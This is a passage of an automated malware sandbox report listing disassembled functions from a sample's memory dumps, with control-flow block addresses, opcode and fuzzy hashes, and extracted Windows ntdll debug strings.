                          • Instruction Fuzzy Hash: 31F01D76650209AFDB05CF55C881EEA77A9FF48310F08815DBC19CB642D778E511CBA4

                          Control-flow Graph

                          control_flow_graph 47 42e285-42e288 48 42e28a-42e28f 47->48 49 42e22f-42e243 47->49 51 42e256-42e283 49->51 52 42e245-42e24d 49->52 53 42e253 52->53 53->51
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 620ea372d248d728081e89d8926d310f7674273f533dfcbe022cd2c2fdb62263
                          • Instruction ID: 072733a89d86e1a20b37d7505ec4f0c36fdef33088d4e3396a9911416279adb3
                          • Opcode Fuzzy Hash: 620ea372d248d728081e89d8926d310f7674273f533dfcbe022cd2c2fdb62263
                          • Instruction Fuzzy Hash: 87F0BEB1E042685ADB60FBBA6C42BCE73689B04304F8445EAA50C92142EE3593488FA5

                          Control-flow Graph

                          control_flow_graph 57 42e70e-42e728 58 42e72e-42e735 57->58 59 42e737-42e739 58->59 60 42e749-42e74c 58->60 59->60 61 42e73b-42e747 call 42e6d3 59->61 61->60
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9b42d2634786242032c3cf20feeb3c5066281e123e526e87d56df8cf085e9bf0
                          • Instruction ID: 53dceb39008c6f3320527b65ad23dff012749cc1a53a0a99b2c7f032207c0014
                          • Opcode Fuzzy Hash: 9b42d2634786242032c3cf20feeb3c5066281e123e526e87d56df8cf085e9bf0
                          • Instruction Fuzzy Hash: 88E04F76B5122137D2205686AD4AFAB676DDBC1B61F4D406AFA0CAB340D5B9D90082E8

                          Control-flow Graph (graph image not included; basic blocks 42e713-42e728, 42e72e-42e735, 42e737-42e739, 42e749-42e74c, 42e73b-42e747; calls 42e6d3)
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: df7bdc3ff78b4769467c641f53c7827f03c54f833d97224b3cb83331040601f0
                          • Instruction ID: 86721405b170526936520b2b9391d4bcfdc03a2d3689df5cdf7690ad457e8398
                          • Opcode Fuzzy Hash: df7bdc3ff78b4769467c641f53c7827f03c54f833d97224b3cb83331040601f0
                          • Instruction Fuzzy Hash: F2E04876B5022527D120558A6C06F57776C9BC1B60F494066FE0897341D564A90042E8

                          Control-flow Graph (graph image not included; basic blocks 42e5a3-42e5ce, 42e5d4-42e5e5)
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c1b9c3e4399eeba896e68a3f01f5d1adf480529a36e0dcae03ff96d9b24bc08
                          • Instruction ID: dbe7326b6ecce26b87581471b72b6081cb43ca52ac60e9199f22fd608944d5c9
                          • Opcode Fuzzy Hash: 1c1b9c3e4399eeba896e68a3f01f5d1adf480529a36e0dcae03ff96d9b24bc08
                          • Instruction Fuzzy Hash: 1EF01C72610209AFCB04CF59C881EEB73ADFB88750F04C129FD198B241D774EA10CBA0

                          Control-flow Graph (graph image not included; basic blocks 42e633-42e646, 42e64c-42e650)
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1934941620.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_42d000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6b7e1aa61001c2ad38e821b6909e094e9abcd2cfa45b901712d81ed3a5f18643
                          • Instruction ID: bbb5f8cb07a0670ae8a8f12577331f64d48d0a93c97cfbbb82a283717230bf09
                          • Opcode Fuzzy Hash: 6b7e1aa61001c2ad38e821b6909e094e9abcd2cfa45b901712d81ed3a5f18643
                          • Instruction Fuzzy Hash: CAC080B16103087FD700EBCCDC46F6533DC970C610F408055B90C9B342D5B4F9108754

                          Control-flow Graph (graph image not included; entry block 14d2890-14d28b3, basic blocks spanning 14d2890-150a5c9; calls 14e0050)
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID:
                          • API String ID: 48624451-0
                          • Opcode ID: 87a6ce5527a7105dd901e6dac542ef8afa7cca4d5404196486c8456706184d6b
                          • Instruction ID: ce12ee0894ae99865573d4e81b99d7e126cd8e8a2e1011edcb67dd16ee1e93e9
                          • Opcode Fuzzy Hash: 87a6ce5527a7105dd901e6dac542ef8afa7cca4d5404196486c8456706184d6b
                          • Instruction Fuzzy Hash: A151D5B2B04216BFCF21DF9DC8A097EFBB8BB58240714826AF465D7651D3B4DE4087A0

                          Control-flow Graph (graph image not included; entry block 14aa250-14aa26f, basic blocks spanning 14aa250-14f7afc; calls 151f290, 14aa6e0, 14aa840, 1494508 and RtlDebugPrintTimes)
                          Strings
                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 014F79D0, 014F79F5
                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014F79D5
                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014F79FA
                          • SsHd, xrefs: 014AA3E4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                          • API String ID: 0-929470617
                          • Opcode ID: 3a9f9bdf31c65b96b18feb18884afee303bf6bb8945723359c095836fa74a7a8
                          • Instruction ID: 522bea5d03bbeec0df04db108a7566f2a2944108edcea29529cbe5850cecdaa0
                          • Opcode Fuzzy Hash: 3a9f9bdf31c65b96b18feb18884afee303bf6bb8945723359c095836fa74a7a8
                          • Instruction Fuzzy Hash: 9BE1D5706043028FE725CE28C484B6B7BE1BB94214F664A2FFAA5CB3B1D735D945CB52
                          APIs
                          Strings
                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 014F9341, 014F9366
                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014F9346
                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014F936B
                          • GsHd, xrefs: 014AD874
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                          • API String ID: 3446177414-576511823
                          • Opcode ID: 5497e3488b846574d72e816f6b0a95046c89a20b4c71480e04bc145f41f3ff2f
                          • Instruction ID: 2b66f2eb1c3e081aa73db06bba0f9850dcd719d6bab283006b5ee93f70f0ea18
                          • Opcode Fuzzy Hash: 5497e3488b846574d72e816f6b0a95046c89a20b4c71480e04bc145f41f3ff2f
                          • Instruction Fuzzy Hash: FBE19071A043428FDB24CF58C480B6BBBE5BB58318F45492EFA958B7A1D770D945CB42
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-$0$0
                          • API String ID: 1302938615-699404926
                          • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                          • Instruction ID: 2540f16863b3988244a122ff114582ccabd229c4629d20b6bb056141d6485706
                          • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                          • Instruction Fuzzy Hash: 6881B070E052499FEF258E6CC8B17FEBBB1EF46360F1A415BE855A73A1C73488418B51
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $$@
                          • API String ID: 3446177414-1194432280
                          • Opcode ID: b335684746aa1587d2e3f832ee9c42cd2cc06160798c387fd1ad2cf189de08f5
                          • Instruction ID: a12fba294751161e2f86911070e229e519798b26ab5c25db360e361b515c1e86
                          • Opcode Fuzzy Hash: b335684746aa1587d2e3f832ee9c42cd2cc06160798c387fd1ad2cf189de08f5
                          • Instruction Fuzzy Hash: 13811A71D002699BEB318B54CC45BEEBBB8AB18714F0541DFEA19B7250D7709E85CFA0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                          • API String ID: 3446177414-56086060
                          • Opcode ID: 51a6082ae0548af7d8ec7adb99903c1573fe27fc54b64d9084f3771ba5156a69
                          • Instruction ID: e8a4a6b013098a333959509d93982c27f2292048f6d148408f5e1dfa25b4f0b5
                          • Opcode Fuzzy Hash: 51a6082ae0548af7d8ec7adb99903c1573fe27fc54b64d9084f3771ba5156a69
                          • Instruction Fuzzy Hash: 67415A31A04241DFD722DF68C484BAAB7B4FF10728F1440AFD9055B7B1CB78A885C7A1
                          APIs
                          Strings
                          • LdrpCheckRedirection, xrefs: 0151488F
                          • minkernel\ntdll\ldrredirect.c, xrefs: 01514899
                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01514888
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                          • API String ID: 3446177414-3154609507
                          • Opcode ID: d47fddfaf0e05d788eb4d4a638fd9d502c7d327571a694e592bad9860bfe47b7
                          • Instruction ID: a08107e39b76a02953d2996538a822d977fa56aff9fadadb91fd3ed8a262d47c
                          • Opcode Fuzzy Hash: d47fddfaf0e05d788eb4d4a638fd9d502c7d327571a694e592bad9860bfe47b7
                          • Instruction Fuzzy Hash: D541B372A14251AFEB23CE5CD840A2A7BE4BF89750B091569ED59EF319D730DC01CB91
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                          • API String ID: 3446177414-3526935505
                          • Opcode ID: 4c140e1eb0c4580c0fa8a5590427a22a45201f3923be914ea8645531b8210fc0
                          • Instruction ID: a2418c7d262811082aab9a57b32d21f8660e7176d29be5a0d31969ec36ea52b8
                          • Opcode Fuzzy Hash: 4c140e1eb0c4580c0fa8a5590427a22a45201f3923be914ea8645531b8210fc0
                          • Instruction Fuzzy Hash: 81312931504780DFD722EB6DC449B9ABBE8EF11B18F14409FE8468B772C7B8A885C761
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $
                          • API String ID: 3446177414-3993045852
                          • Opcode ID: 06af38fe3e52db860bb53b1b910138318ef65d2234b76c112475c8a4da7a4390
                          • Instruction ID: 5f88e961820c56568a168c6c2640be2e0b92e24fd1e7987f569fc4678a1dbaa7
                          • Opcode Fuzzy Hash: 06af38fe3e52db860bb53b1b910138318ef65d2234b76c112475c8a4da7a4390
                          • Instruction Fuzzy Hash: 68116532D04219EBCF159FA4D84869D7B71FF54761F10851AF82A6B2E0CB315A05DF80
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 48be9c90368eb5645b4314dcc624a9582cbf95b306310a10b50dab5e9822ba85
                          • Instruction ID: 7de05db65a7255587095d7ef1b7b42664bfadeec310778c44112773b5b3ddd16
                          • Opcode Fuzzy Hash: 48be9c90368eb5645b4314dcc624a9582cbf95b306310a10b50dab5e9822ba85
                          • Instruction Fuzzy Hash: C3E10271D00608DFCB25CFA9C980AEEBBF1BF58314F14492AE54AA7361D771A845CF20
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: b3bdf50ce49f92988ff5e8c8af6d79932ce693bd3f67234504382a3d58580dfa
                          • Instruction ID: 04ca7ae0eb114a1ba3ca8cb59370bd86beaf07d8cfadc79f4e34a97540a04604
                          • Opcode Fuzzy Hash: b3bdf50ce49f92988ff5e8c8af6d79932ce693bd3f67234504382a3d58580dfa
                          • Instruction Fuzzy Hash: B2712671E002199FDF16CFE8C984AEDBBF5BF48714F14442AE915AB294D734A905CBA0
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                           • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: ccca0870506671eafea1396a23524ff4ecda12658616e3422751b18d300ecd7f
                          • Instruction ID: 9e86eb9062cbb001c076be58ac7d40b273e4f026fa126ef7f79b99e42da414c0
                          • Opcode Fuzzy Hash: ccca0870506671eafea1396a23524ff4ecda12658616e3422751b18d300ecd7f
                          • Instruction Fuzzy Hash: 39511271E00219AFDF1ACFD8D845ADDBBF1BF88324F18812AE915AB290D7349905CF54
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                           • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                          • String ID:
                          • API String ID: 4281723722-0
                          • Opcode ID: 01ac6a223e540086d7bbec25b9f4a4b0fd684693e1152624ae67ccb4d700d40d
                          • Instruction ID: 8aa350aafefe279b12d8aaee2bbd1f46aabcb2ccc83be9fff0baf73f03a4a29d
                          • Opcode Fuzzy Hash: 01ac6a223e540086d7bbec25b9f4a4b0fd684693e1152624ae67ccb4d700d40d
                          • Instruction Fuzzy Hash: A8314771E00219AFCF21DFA8D884AADBBF1FB58721F11412AE521BB290D7715D00CF54
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                           • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 61280133409e9932649cacab9906e985792f61c4a0137bba86b36c907b38baa0
                          • Instruction ID: f0592012f3d6afbe0ff249e3a679a6a8ca5b1edca3a1be56d9d5058d2f849862
                          • Opcode Fuzzy Hash: 61280133409e9932649cacab9906e985792f61c4a0137bba86b36c907b38baa0
                          • Instruction Fuzzy Hash: 8B326A70D0026ADFDF22CF68C844BEEBBB1BB18314F1081EAD549AB261D7755A85CF90
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                           • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmp
                           • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-
                          • API String ID: 1302938615-2137968064
                          • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                          • Instruction ID: 81b9f162f97677ecc3b974e8a146d39a342cf84b7faa74370152fbea739991d6
                          • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                          • Instruction Fuzzy Hash: 4591AE71E0021A9AEF34CF6DC8B1ABFBBA1AF4432AF14455FE955A73E0D73089418B51
                          APIs
                          Strings
                          Memory Dump Source
